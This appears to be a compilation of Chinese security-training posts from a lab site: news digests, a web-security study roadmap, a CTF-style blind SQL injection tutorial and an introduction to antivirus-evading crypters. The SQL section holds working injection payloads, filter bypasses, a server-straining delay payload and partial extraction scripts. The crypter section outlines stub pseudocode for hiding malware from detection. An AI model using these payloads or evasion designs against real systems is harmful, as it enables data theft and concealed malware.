免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、空客网络安全子公司Stormshield披露数据泄露 https://www.securityweek.com/airbus-cybersecurity-subsidiary-stormshield-discloses-data-breach 2、思科修复了小型企业路由器，SD-WAN中的关键漏洞 https://www.securityweek.com/cisco-patches-critical-vulnerabilities-small-business-routers-sd-wan 3、Realtek RTL8195A Wi-Fi模块漏洞使许多设备面临远程攻击 https://www.securityweek.com/vulnerabilities-realtek-wi-fi-module-expose-many-devices-remote-attacks 4、Google修复了在野利用的Chrome零日漏洞 https://securityaffairs.co/wordpress/114224/hacking/google-chrome-zero-day.html 5、Matryosh DDoS僵尸网络通过ADB感染Android设备 https://securityaffairs.co/wordpress/114216/malware/matryosh-ddos-botnet-android.html 6、SonicWall发布了SMA 100零日漏洞的补丁 https://securityaffairs.co/wordpress/114197/hacking/sonicwall-zero-day-patch.html 7、攻击者利用Google Firebase对Office 365 用户进行钓鱼攻击 https://threatpost.com/microsoft-office-365-attacks-google-firebase/163666/ 8、SoftMaker Office PlanMaker中发现多个漏洞 https://blog.talosintelligence.com/2021/02/vuln-spotlight-softmaker-office-planmaker.html 9、克什米尔地区巴帝电信250万用户的数据遭受泄露 https://ciso.economictimes.indiatimes.com/news/data-of-25-lakh-airtel-customers-in-j-k-allegedly-leaked-telco-claims-no--in-server/80661483 10、Clearview面部识别技术在加拿大被裁定为非法 https://threatpost.com/clearview-facial-recognition-canada/163650/

你是否正在收集各类网安网安知识学习，蚁景网安实验室为你总结了1300+网安技能任你学，https://www.yijinglab.com/loginLab.do#stu>> Web安全浅析 在探讨Web安全学习之前，首先了解一下什么是Web 看到这里，你可能会问：这么多内容都需要学习吗？ 答案是：可以不用学得很深入，但是如果不了解这些研究对象，是不可能搞好的安全研究的。（原话来自余弦大佬在知乎的回答） 那么这么多内容应该从哪里开始学呢？别急，等了解完什么是Web安全再学也不迟。 把Web服务各层串联起来的就是数据流，掌握了数据流就能知道数据在每层是如何处理的。而在数据流中有一个关键的协议，就是HTTP协议，搞明白HTTP协议后，你就会明白一个专业术语“输入输出”。黑客通过输入提交‘特殊数据’，‘特殊数据’在数据流的每个层处理，如果其中某一层没处理好，在输出的时候，就会出现相应层的安全问题，也就是本文的重点——Web安全。 例如： 操作系统：数据如果在操作系统层上没处理好，可能会产生命令执行等安全问题； 存储：数据如果在存储层上没处理好，可能会产生SQL注入等安全问题； Web容器：数据如果在Web容器层中没处理好，可能会产生远程溢出、DoS等安全问题； Web服务端语言：代码审计对于安全人员来说也是一项重要技能； Web开发框架/Web应用：数据如果在这里没处理好，可能会产生命令执行等安全问题； Web前端框架：数据如果在Web前端框架中没处理好，可能会产生XSS跨站脚本等安全问题； 到这里可以看出“输入输出”对于安全的重要性了吧。 接下来的内容都是干货 初步了解了什么是Web以及容易产生的一些安全问题，下面具体来说说入门Web安全应该学什么，怎么学。 还是从Web服务说起，操作系统层具体分为Windows和Linux，Windows又有Win10、Win8、Win7、WindowsServer 2016、WindowsServer 2012、WindowsServer 2008、WindowsServer 2003等版本，主要了解它们的安全配置及相关漏洞。 Windows系统安全配置： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916560700001&通过学习Windows系统安全配置课程，基本了解Windows操作系统的安全加固方法 Windows系统加固： http://www.yijinglab.com/expc.doec=ECID172.19.104.182015070809494300001这也是和Windows系统安全加固相关的实验。 还有很多Windows相关的比如文件系统备份、用户管理、日志清理、用户口令破解等知识，都可以在 http://www.yijinglab.com/pages/search.html?wk=Windows进行学习。 而Linux又有CentOS、Redhat、Ubuntu、Debian、Fedora、openSUSE等诸多发行版本，说到Linux，不得不提那本被推荐了无数遍的——《鸟哥的Linux私房菜》 http://cn.linux.vbird.org/纯文字的阅读难免让人感觉枯燥，作者更喜欢一边学习一边动手操作： Linux入门最佳实践： http://www.yijinglab.com/cour.do?w=1&c=CCID7ca1-dae5-48f4-8dd6-d8b6c2b5938b&课程包括Linux的发展、文件管理基础命令、管道命令、账户及系统管理等 存储层主要分为数据库存储、内存存储和文件存储，其中数据库有MySQL、Oracle、MSSQL、access、MongoDB、Redis等，数据库是SQL**注入**学习的基础。 MySQL数据库相关基础学习： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015082709474200001了解MySQL表的结构与内容，增加用户及授权，删除用户等操作。 MongoDB安全配置： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182016030216511800001实验介绍了MongoDB数据库及其安全攻防实践，通过学习此实验了解MongoDB的基本操作和安全特性。 Redis数据库安全实践: http://www.yijinglab.com/cour.do?w=1&c=C172.19.104.182015052010331700001& 系统性的SQL、MySQL学习也可以到w3cschool上进行。 Web容器包括Apache、IIS和Nginx，这里推荐几个集合环境软件： php集合环境软件phpStudy： http://www.phpstudy.net/phpstudy/phpStudy20161103.zip jsp集合环境软件jspStudy： http://www.phpstudy.net/phpstudy/JspStudy.zip ASP集合环境软件小旋风ASP服务器： http://www.jb51.net/softs/35167.html 第一个phpStudy集合了Apache、MySQL和PHP，将Web源码放到phpStudy里就搭建好了自己的Web服务器。具体教程自行百度，这里就不放链接了。 Web服务端语言：前面提到了代码审计，入门Web安全其实不需要对语言进行系统性的学习，这样很浪费时间，只要平时在分析漏洞原理、查看目标网站源代码等时候，对重要的函数、方法等有所了解，能够举一反三即可。 PHP基础： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916344500001&通过基础实验了解PHP语言，为后续的学习打下基础。 PHP代码审计： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916230700001&通过此实验学习PHP代码审计的基础知识及PHP常见危险函数 Web框架/应用：开发框架包括Struts2、React、Django、thinkPHP等，前端框架包括jQuery、Bootstrap、HTML5、semanticUI、Pure等，Web应用包括BBS，blog，discuz、metinfo、Joomla等各种CMS，不需要大家用这些框架搭建Web应用，只需要了解各框架/CMS存在哪些漏洞，其原理、利用以及如何进行修复等。 横向的学习路径介绍完，开始纵向学习数据流之《HTTP从入门到放弃》。 协议这个东西光靠看书学习很费劲，有什么快速掌握的途径吗？ 还真的有，通过学习一些入门的HTTP**协议**，然后浏览器F12看看‘Network’标签里的HTTP请求响应，结合wireshark等协议分析软件，不出几个小时，就大概能知道HTTP协议是什么了。 HTTP协议基础： http://www.yijinglab.com/expc.do?ce=08398307-4303-4dde-bcfc-e8bd67f2e772 wireshark数据抓包分析之HTTP协议： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015121711544400001掌握wireshark的基本操作，加深对HTTP协议的理解。 通过wireshark分析其他协议： http://www.yijinglab.com/cour.do?w=1&c=C172.19.104.182015012915332000001& 梳理完Web服务的学习，下面正式开始入门Web安全，掌握了下面这些，就算Web安全入门了。 一、命令执行 命令执行漏洞： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2017050511014000001通过实验了解命令执行漏洞产生的原因，学习漏洞的利用和修复。 ImageMagick命令执行漏洞： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2016072212485000001由于大量的Web程序都使用了ImageMagic的拓展，导致本地命令执行漏洞在Web环境里可以被远程触发，危害巨大。 Memcached远程命令执行漏洞： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2016111016360600001 通过实验学习memcached远程命令执行漏洞的利用及修复方法。 还有很多命令执行漏洞的学习实例： http://www.yijinglab.com/pages/search.html?wk=%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C 二、SQL注入 包括布尔盲注、时间盲注、报错注入、联合查询注入、宽字节注入、二次注入等。 渗透SQL注入： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916131700001&在入门之前先了解SQL注入的原理： SQL注入初级： http://www.yijinglab.com/cour.do?w=1&c=C172.19.104.182014081415242400001&九个实验带你入门SQL注入： [公开课]有一种注入叫SQL注入： http://www.yijinglab.com/expc.do?ce=f18c2a12-c43d-4469-871f-6cb1cbf5a821从SQL语句基础到SQL注入漏洞形成原理和实战利用，让你认识什么是SQL注入。 三、文件上传 包括客户端绕过js检查进行上传及服务端绕过后缀及内容检查进行上传，服务端绕过又包括特殊后缀欺骗上传、配合解析漏洞上传、截断上传等。 文件上传漏洞： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2017042513351500001学习文件上传漏洞产生的原因，以及如何利用和修复。 [公开课]玩转文件上传漏洞： http://www.yijinglab.com/expc.do?ce=5a965bc3-29d8-4658-a203-be1a144219ff通过此公开课学习文件上传漏洞产生的原因，以及文件上传绕过的各种姿势。 kindEditor文件上传漏洞分析和利用： http://www.yijinglab.com/expc.do?ce=85d2566f-1161-47fa-b23c-0a5ac5649f07kindEditor编辑器组件最近爆出的文件上传漏洞，通过实验还原入侵过程，了解漏洞原理和防护方法。 四、文件包含 包括本地文件包含和远程文件包含。 文件包含漏洞： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015060917272000001 简单的文件包含： 五、溢出、Dos 缓冲区溢出基础与实践： http://www.yijinglab.com/expc.do?ec=9613f998-8cd2-4981-9bc5-9900c97371de通过实验了解缓冲区溢出的原理与危害，掌握缓冲区溢出的基本方法，学会进行常见的缓冲区溢出攻击。 缓冲区溢出漏洞调试与分析： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014040109201500001利用缓冲区溢出攻击，可以导致程序运行失败、系统宕机、重启等后果。 实战挖掘某ftp服务器溢出漏洞： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015091110221500001了解ftp服务漏洞的表现形式及利用方法。 六、跨站脚本攻击（XSS） 包括反射型XSS、存储型XSS及DOM型XSS。在学习XSS前，应该熟悉HTML/CSS及JavaScript，否则很难研究好XSS。 HTML基础： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2017041911340800001了解HTML的基本结构和标签。 JavaScript基础： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2017041815391500001了解什么是JavaScript，了解DOM操作和BOM操作。 渗透XSS： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916134500001&学习XSS漏洞原理，以及如何利用XSS漏洞对目标系统进行渗透测试。 七、跨站请求伪造（CSRF） 分为GET型和POST型。 渗透CSRF： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2017041916141200001&八、XML外部实体注入攻击（XXE） 在学习XXE前，应该熟悉XML语言，否则很难研究好XXE。 XXE漏洞攻击与防御： http://www.yijinglab.com/cour.do?w=1&c=CCIDc75d-d37a-42d4-878b-6f130c004ad2&包括对XXE漏洞的分析与相关组件XXE漏洞学习： 九、解析漏洞 Apache解析漏洞： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015120111342100001了解解析漏洞原理，常用的攻击方法以及有效的防御手段。 Nginx解析漏洞： http://www.yijinglab.com/expc.do?ec=ECID218.76.35.762014021910351300001 IIS解析漏洞在fckEditor上传攻击中的利用： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015102217243800001通过实验学习IIS6.0中的解析漏洞，掌握IIS6.0解析漏洞在fckEditor上传攻击中的利用方法。 十、身份认证与访问控制 统一身份认证： http://www.yijinglab.com/expc.do?ec=ECIDb263-0747-4118-9d51-c33f31691cb7判断一个用户是否为合法用户的处理过程。 非授权访问： http://www.yijinglab.com/expc.do?ec=ECIDa2d4-e095-420a-9709-21e18a531479包括非法用户进入网络或系统进行违法操作，合法用户以未授权的方式进行操作。 Jenkins未授权访问漏洞利用实践： 十一、反序列化 包括PHP反序列化、Java反序列化、Python反序列化等。 PHP反序列化漏洞： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182016010714511600001了解什么是反序列化漏洞，其成因以及如何挖掘和预防反序列化漏洞。 Java反序列化漏洞： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015111916202700001以ApacheCommons Collections3为例，分析和复现Java反序列化漏洞。 Python反序列化漏洞： http://www.yijinglab.com/expc.do?ec=ECID7eab-0fb2-4f21-96df-5c1f912e5572了解Python反序列化漏洞产生的机理，增强安全意识。 十二、Web框架/应用安全 前面提到了Struts2、React、Django、thinkPHP等开发框架，jQuery、Bootstrap、HTML5、semanticUI、Pure等前端框架，以及discuz、metinfo、Joomla等各种CMS。 Struts2框架安全： http://www.yijinglab.com/expc.do?ec=ECID218.76.35.762014021913330900001! Struts2（s2-045）远程命令执行漏洞分析与复现： http://www.yijinglab.com/expc.do?ec=ECID9d6c0ca797abec2017031012041000001! ThinkPHP5远程代码执行漏洞： http://www.yijinglab.com/expc.do?ce=06d28a64-2021-4cbb-a3f9-65a27bfd7ce2! Joomla未授权创建账号/权限提升漏洞： http://www.yijinglab.com/expc.do?ce=da5480f4-87af-412a-90f6-72b1c2cbd920! Joomla反序列化远程代码执行漏洞： http://www.yijinglab.com/expc.do?ec=ECID172.19.104.182016012817294800001 BEEF框架攻击： http://www.yijinglab.com/cour.do?w=1&c=C9d6c0ca797abec2016091409272000001&以WordPress 博客系统为基础，典型的XSS漏洞为案例，详细学习beef平台下各个模块的常用命令和攻击方法。 看到这里有没有一种怀疑人生的感觉？ 不用怀疑，入门Web安全没有你们想象的那么难，弄懂上面说的这些，你还会觉得你是一个什么都不懂的小白吗？ 可能大家会问，入门Web安全之后应该如何提升个人技能呢？ 如果有已经入门了的朋友，或者说对Web安全有了一定的了解，想掌握更多的Web安全技能，麻烦大家在留言处吱一声，作者会根据留言情况考虑是否出一个Web安全进阶学习路线。 也麻烦还没有入门的朋友，先按照文章提到的内容一步步来。 亲亲，这边建议您点击阅读原文直接前往蚁景网安实验室进行学习呢，PC端体验更佳哟！ 这个技术你学会了吗？加入网安实验室，1300+网安技能任你学！

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、sudo CVE-2021-3156漏洞影响Apple，Cisco产品 https://www.securityweek.com/recent-sudo-vulnerability-affects-apple-cisco-products 2、研究人员发现SolarWinds产品中新高危漏洞 https://www.securityweek.com/solarwinds-product-vulnerabilities-allow-hackers-take-full-control-systems 3、Adobe ColdFusion 存在特权升级漏洞 https://www.securityweek.com/weak-acls-adobe-coldfusion-allow-privilege-escalation 4、Google发布Android安全补丁修复了40多个漏洞 https://www.securityweek.com/google-patches-16-high-severity-privilege-escalation-vulnerabilities-android 5、研究人员发现Limit Login Attempts Reloaded 插件零日漏洞 https://securityaffairs.co/wordpress/114186/hacking/zero-day-wordpress.html 6、Hildegard恶意软件劫持Kubernetes集群进行挖矿 https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/ 7、28个Chrome插件劫持了数百万人的Google搜索结果 https://thehackernews.com/2021/02/over-dozen-chrome-extensions-caught.html 8、32亿条邮箱和密码明文对在黑客论坛上泄露 https://cybernews.com/news/largest-compilation-of-emails-and-passwords-leaked-free/ 9、新的XS-Leak攻击利用浏览器重定向来窃取用户隐私 https://portswigger.net/daily-swig/playing-fetch-new-xs-leak-exploits-browser-redirects-to-break-user-privacy 10、DriveSure 320W客户数据泄露 https://www.scmagazine.com/home/security-news/data-on-3-2-million-drivesure-users-exposed-on-hacking-forum/

前言 Blind SQL（盲注）是SQL注入攻击的其中一种。在sql注入过程中，sql语句执行后数据不会回显到前端页面，此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。 本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=ECIDee9320adea6e062017112114363500001 （本实验讲解了MySQL注入中，3种盲注方式：基于布尔的盲注、基于时间的盲注、基于报错的盲注。通过学习本实验，能了解盲注原理。） SQL盲注基本知识 常用基本函数 IF(expr1,expr2,expr3) 若expr1为true，则返回expr2，为false则返回expr3 SELECT IF(TRUE, 'A','B') -- 输出结果：A SELECT IF(FALSE,'A','B') -- 输出结果：B ASCII(str) 返回字符串str最左面字符的ASCII值 SELECT ASCII("flag") -- 输出结果：102 ORD(str) 返回字符串str第一个字符的ASCII值 SELECT ORD("flag") -- 输出结果：102 CHAR(int) 将ASCII码值int转换成字符 SELECT CHAR(65) -- 输出结果：A MID(str,pos,len) 从pos位置开始，截取字符串str共len个长度的字符 SELECT MID("Hello World", 3, 5) -- 输出结果：llo W 与SUBSTR(str,pos,len) 效果相同 LEFT(str,len) 返回字符串str左边部分共len个字符 SELECT LEFT("flag", 2) -- 输出结果：fl SLEEP(duration) duration是休眠的时长，以秒为单位，也可以是小数 SELECT SLEEP(3) # [SQL] SELECT SLEEP(3) # 受影响的行: 0 # 时间: 3.005ms REGEXP 正则表达式，用来匹配文本的特殊的串（字符集合） SELECT "FLAG" REGEXP "LA" -- 输出结果：1 SELECT "FLAG" REGEXP "[0-9]" -- 输出结果：0 其它 LENGTH(str) -- 返回字符串str的长度 DATABASE() -- 返回当前数据库名 VERSION() -- 返回当前MySQL版本 布尔盲注 根据注入点的输入，页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据。 SELECT IF(LENGTH(DATABASE())>3, 1, 2) -- 输出结果：1 SELECT IF(LENGTH(DATABASE())>4, 1, 2) -- 输出结果：2 据此可知数据库名的长度为4 时间盲注 通过执行时间的长短来判断是否执行成功，也就是时间延迟注入。 SELECT IF(MID(DATABASE(),1,1)='c', SLEEP(3), 2) -- 3秒后才响应 SELECT IF(MID(DATABASE(),1,1)='a', SLEEP(3), 2) -- 立即响应 据此可知数据库名的第一个字符为c 以下2道题目：flag在flag表的flag字段 在本地搭建靶机，用post传参，变量keywords接收 基于运行错误的布尔盲注 基于运行错误的布尔盲注即能够通过sql语句的语法、语义分析，但运行时报错。 我们可以将其作为IF(expr1,expr2,expr3)的expr3，当expr1为true时，返回expr2，页面正常，而为false时，则会执行expr3，此时因为运行错误而页面无法正常显示。 ST_GeomFromText(character-string[, srid]) 是根据字符串表示构造几何的方法，即： SELECT ST_GeomFromText( 'LineString( 1 2, 5 7 )', 4326 ) -- 输出结果：[0102000020E610000002000000000000000000F03F000000000000004000000000000014400000000000001C40] ST_X(point)：该方法是获取点的x坐标，它操作的对象是一个点，即： SELECT ST_X(POINT(2,3)) -- 输出结果：2 但当操作对象不是点时，运行会报错，却能够通过sql的检查，所以可以用来构造true和false两种情况下出现不同的页面 SELECT IF(1, 1, ST_X(ST_GeomFromText('POINT(aaa)'))) -- 输出结果：1 SELECT IF(0, 1, ST_X(ST_GeomFromText('POINT(aaa)'))) -- ERROR 3037 (22023): Invalid GIS data provided to function st_geometryfromtext. P.s. ST_GeomFromText 、 ST_MPointFromText 是两个可以从文本中解析Spatial function的函数。 需要注意的是 ST_GeomFromText 针对的是 POINT() 函 数， ST_MPointFromText 针对的是 MULTIPOINT() 函数的。 其他可用的函数： SELECT IF({}, ST_X(ST_GeomFromText('POINT(mads)')), 0); SELECT IF({}, ST_MPointFromText('MULTIPOINT (mads)'),0); SELECT IF({}, ST_X(MADS), 0); SELECT IF({}, ST_MPointFromText('MADS'),0); SELECT IF({}, ST_GeomFromText('MADS'),0); 如果题目过滤了ST，可以尝试用GeomFromText()和X()，但MySQL在5.7.6版本之后就弃用了。 NameDescriptionX() (deprecated 5.7.6)Return X coordinate of PointGeomFromText()(deprecated 5.7.6)Return geometry from WKT 当输入1、2、3等数字时，页面返回Hello World 而当输入被过滤的关键字时，网页返回No Hacker 由此可以测试一些被过滤的关键字有： '、"、or、-、*、>、<、=、like、sleep、substr、mid、ascii、ord 然而在不被ban掉的情况下，网页只能返回一种页面，无法进行平常的数字型盲注。 而像if(0,1e9999,1)，因为无法通过sql语句的检查，所以页面无法正常显示，更别说if(1,1e9999,1)了。 此时可以考虑用基于运行错误的布尔盲注，语法、语义上能够通过sql的检查，但如果执行到该语句却会运行错误，这样便能够构造true和false两种情况了。 用if来进行盲注，'被过滤了，用十六进制绕过。 if(1,1,ST_X(ST_GeomFromText('POINT(mads)')) > if(1,1,ST_X(ST_GeomFromText(0x504F494E54286D61647329)) 此时页面返回Hello World。题目说flag在flag表的flag字段，用left()截取第一个字符进行判断，=和like可以用regexp代替。 构造payload： if(left((select flag from flag),1) regexp char(102),1,ST_X(ST_GeomFromText(0x504F494E54286D61647329))) 此时页面仍然返回Hello World，可以知道flag的第一个字符是char(102)，也就是f if(left((select flag from flag),2) regexp char(102,108),1,ST_X(ST_GeomFromText(0x504F494E54286D61647329))) 而第二个字符是char(108)，也就是字符l 用python写个脚本 import requests def fun(string): result = "" j = 1 for i in string: if j != len(string): result = result + str(ord(i)) + "," else: result = result + str(ord(i)) j += 1 return "char(" + result + ")" url = "http://sqlblind.com/index.php" tables = "abcdefghijklmnopqrstuvwxyz0123456789-_}{" flag = "" fo 基于巨大运算时间的时间盲注 由于在这里过滤了ST，所以以ST开头的函数会被ban，无法使用。 同时又过滤了sleep，所以无法通过时间休眠来延迟时间，也就没法用sleep来进行时间盲注。 但我们可以通过sql语句来执行一个运算时间很长很长的语句，以此来作为时间延迟，也就是说用if来判断flag的字符，如果正确则执行一个需要很长运算时间的语句，否则返回0。 所以之后用python写脚本的时候，设定一个超时时间，在设定时间内没有返回内容即字符正确，这样便能进行时间盲注了。 在此之前先了解几个函数 rpad(str,len,padstr) 对字符串str进行右填充，用padstr填充至str长度为len个字符 SELECT RPAD('hi', 5, '?') -- 输出结果：hi??? concat(str1,str2,...) 连接多个字符串为一个字符串 SELECT CONCAT('he', 'll', 'o') -- 输出结果：hello repeat(str,count) 返回字符串str重复count次后的字符串 SELECT REPEAT('ab', '3') -- 输出结果：ababab 构造payload： 1 and if((select flag from flag) regexp binary 'f',rpad('a',5000000,'a') regexp concat(repeat('(a.*)+',30),'b'),0) 也就是说如果flag的第一个字符为f的话，则会执行下面这句语句： rpad('a',5000000,'a') regexp concat(repeat('(a.*)+',30),'b') rpad('a',5000000,'a')会填充为5000000个a，会构造成一个很长的字符串，与字符串concat(repeat('(a.*)+',30),'b')去作正则匹配，通过巨大的运算量来延时。 这样做的话服务器可能会崩 由于题目过滤了'，所以用十六进制代替 1 and if((select flag from flag) regexp binary 0x66,rpad(0x61,5000000,0x61) regexp concat(repeat(0x28612E2A292B,30),0x62),0) 以下两种图片用get传参测试时间延迟效果 猜中flag的第一个字符时： 而如果猜第一个字符为0x01，则为false，if返回0 所以我们可以通过大量的运算时间做延迟，进行时间盲注。 但服务器进程在接到客户端传送过来的SQL语句时，不会直接去数据库查询。服务器进程把这个SQL语句的字符转化为ASCII等效数字码，接着这个ASCII码被传递给一个HASH函数，并返回一个hash值，然后服务器进程将到shared pool中的library cache（高速缓存）中去查找是否存在相同的hash值。如果存在，服务器进程将使用这条语句已高速缓存在SHARED POOL的library cache中的已分析过的版本来执行，省去后续的解析工作，这便是软解析。 所以多次查询rpad('a',5000000,'a') regexp concat(repeat('(a.*)+',30),'b')后将不再延迟，所以对rpad()的5000000需要每次自减1 脚本来自http://www.plasf.cn import requests def ord2hex(string): result = "" for i in string: r = hex(ord(i)) r = r.replace('0x', '') result = result+r return '0x'+result url = "http://sqlblind.com/index.php" tables = "abcdefghijklmnopqrstuvwxyz0123456789-_}{" result = "" for i in range(1, 50): for j in tables: if j == "{" or timeout：设定超时时间，秒为单位在设定时间内没有返回内容则返回一个timeout异常 若是3秒内没有返回内容则返回timeout异常，即字符正确，打印输出

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、嵌入式软件开发商Wind River披露数据泄露 https://www.securityweek.com/embedded-software-developer-wind-river-discloses-data-breach 2、复杂的多平台恶意软件“ Kobalos”针对超级计算机 https://www.securityweek.com/sophisticated-multiplatform-malware-kobalos-targets-supercomputers 3、华盛顿州审计署160万用户数据遭泄露 https://www.securityweek.com/over-1-million-impacted-data-breach-washington-state-auditor 4、SonicWall证实零日漏洞已导致上千台设备受到攻击 https://www.securityweek.com/sonicwall-says-few-thousand-devices-impacted-zero-day-vulnerability 5、苹果发布NAT Slipstreaming 2.0攻击补丁 https://www.securityweek.com/apple-issues-patches-nat-slipstreaming-20-attack 6、RansomExx勒索软件利用VMWare ESXi漏洞来加密VM磁盘 https://www.zdnet.com/article/ransomware-gangs-are-abusing-vmware-esxi-exploits-to-encrypt-virtual-hard-disks/ 7、警察考试数据库泄露了50万印度公民的PII https://securityaffairs.co/wordpress/114148/data-breach/police-exam-database-exposes-500k-indian-citizens-pii.html 8、新的Trickbot模块使用Masscan进行本地网络侦察 https://www.zdnet.com/article/new-trickbot-module-uses-masscan-for-local-network-reconnaissance/ 9、CISA：许多SolarWinds 攻击受害者与SolarWinds没有直接关系 https://securityaffairs.co/wordpress/114114/hacking/solarwinds-hackers-victims-no-direct-link.html 10、网络钓鱼活动通过伪造的PPP贷款引诱美国企业 https://www.bleepingcomputer.com/news/security/phishing-campaign-lures-us-businesses-with-fake-ppp-loans/

2021年，我们热血开局！ 1月的最后一周，我们再次见证了成长与历练。 时间：2021/1/26-1/28 事件：蚁景杯 WUST CTF2021新生赛 蚁景杯 WUST CTF2021新生赛：武汉科技大学俱乐部2021首场CTF竞赛，WEB、PWN、 MISC、CRYPTO、REVERSE五大题型迎接新生来战！ 比赛为期三天，一方面考验着参赛队员的耐力值；题目类型涵盖面较广，在考验新生“学习情况”方面下足了“猛料”。 武汉科技大学俱乐部，因为热爱聚集到一块，学习从0到1的过程，响应号召，依然极客前行！

我一直认为，在黑客世界里，加密技术是一种很神秘的艺术，是一种很隐晦的东西，我们可以查找资料来进行研究。当然，它在黑客世界中已经变得非常普遍，尤其是在2013年和2014年推出了Veil-Evasion和shellter工具。在这篇文章中，我将详细介绍加密工具的类型以及它们在底层的工作原理，然后展示低级代码层面上一些鲜为人知的技术。在阅读完这篇文章后，我希望大家最终能对这些玩意儿的工作原理以及它们在计算机世界中的地位和作用有一定程度的了解。 本文涉及知识点实操练习：https://www.yijinglab.com/expc.do?ec=14804a13-fea8-4bcf-a928-a71a40e7cfa4 （通过本实验，了解RC4加密技术） 稍微声明一下：有些材料可能不适合初学者，因为它们需要相当多的Windows底层的知识。包括以下很多技术。 掌握 C/C++ 熟悉WinAPI 和对应的文档 熟悉基础的加密知识 熟悉PE文件的结构 熟悉 Windows 虚拟内存 熟悉进程和线程  密码学的两个方面 当我们谈起对于密码学的印象时，我们经常会想到 "这是一种处理信息的手段，防止信息被泄露出去"。我们大多数人都把它看成是一种防御机制，其应用的目的在于确保信息的安全，阻止恶意的攻击。当然，我们很清楚这一点，因为它被发明出来的唯一目的就是保护数据，然而，正如我们很快就会看到的那样，密码学的功能已经远远不止这些。 如果我们使用传统的密码学来进行恶意攻击，即设计恶意软件，利用密码学提供的优势。这些类型的恶意软件在现代已经非常普遍，包括勒索软件和非对称后门等，它们主要涉及公钥密码学。  反病毒机制 为了能够设计出绕过杀毒软件的方式，我们必须首先要明白杀毒软件的杀毒方式。我将简单介绍一下杀毒软件检测应用程序采用的两种主要方法。 基于签名的检测 顾名思义，基于签名的检测是一种将应用程序的签名与相应的已知恶意软件的数据库进行交叉参考匹配的技术。这是预防和遏制之前出现过的恶意软件的有效措施。 基于启发式检测 虽然基于签名的检测可以防止大多数以前已知的恶意软件，但它也有缺点，因为恶意软件作者可以针对这种方法添加保护措施，如使用多态和变形代码等。基于启发式的检测会监控应用程序的行为和特征，并将其与已知的恶意行为进行匹配。请注意，只有在应用程序正在运行的情况下才会进行这种检测。 当然，杀毒软件要比这个高级很多。由于这已经超出了文章讨论的范围，也超出了我的理解范围，所以这里不会涉及这些信息。 加密技术简介 加密器是被设计用来保护文件内部信息的软件，并且在执行后，用解密程序提取后能够完整地提供信息。请注意，虽然加密器可以被用于恶意目的，但它也主要用于混淆数据，防止对软件逆向工程。在本文中，我们将重点讨论恶意使用的情况。那么，这是如何工作的呢？让我们先来了解密码器的各部分，看一下它们的作用。 加密器负责对目标对象进行加密。  +-------------+ +-----------+ +-------------------+ +--------+ | Your file | -> | Crypter | => | Encrypted file | + | Stub | +-------------+ +-----------+ +-------------------+ +--------+ +------------------+ +--------+ +---------------+ | Encrypted file | + | Stub | = Execution => | Original File  扫描时加密器 这些类型的加密器由于能够加密磁盘上的数据而被称为扫描时加密器，杀毒软件可以对文件进行扫描，例如基于签名的检测。在这一阶段，只要应用的混淆技术是足够强大的，杀毒软件将永远无法检测到任何恶意活动。 运行时加密器 这些加密器将加密技术提升到了一个新的水平，能够在内存中运行时根据需要对数据进行加密。通过这样做，能够使恶意软件在杀毒软件作出反应之前加载和执行。在这个阶段，一个应用程序可以快速地运行它的有效载荷并达到它的目标。但是恶意软件完全有可能在执行阶段触发杀毒软件的基于启发式的检测策略，所以恶意软件作者应该小心。 现在我们已经介绍了高层次的内容，那么我们就来看看这两种类型的实例。 编写扫描时间加密器 扫描时加密器是两者中比较简单的，因为它不需要虚拟内存和进程/线程的知识。本质上，stub会对文件进行处理，把它放到磁盘上的某个地方，然后执行它。下面记录了一个扫描时加密器的设计。 注意：为了简洁和可读性，内容将不包含错误检查。 加密器和stub伪代码 1.检查是否有命令行参数 +-> 2. 如果有命令行参数，则作为加密器对文件进行加密处理 | 3. 打开目标文件 | 4. 读取文件内容 | 5. 对文件内容进行加密 | 6. 创建一个新文件 | 7. 将加密后的文件写入新文件 | 8. 結束 | +-> 2. 如果没有命令行参数，则作为stub 3. 打开加密文件 4. 读取文件内容 5. 解密文件内容 6. 创建一个临时文件 7. 将解密后的内容写入临时文件 8. 执行文件 9. 完成 